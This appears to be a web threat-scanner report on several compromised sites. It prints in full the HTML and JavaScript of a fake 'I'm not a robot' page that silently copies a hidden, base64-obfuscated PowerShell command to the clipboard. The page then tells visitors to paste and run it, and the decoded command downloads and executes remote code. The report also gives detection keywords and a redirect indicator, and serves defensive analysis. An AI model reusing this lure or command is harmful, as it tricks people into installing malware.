#d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://website.mypetapp.co.za/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.zamilgroups.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://www.zamilgroups.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://lucprofessional.grupomoltz.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
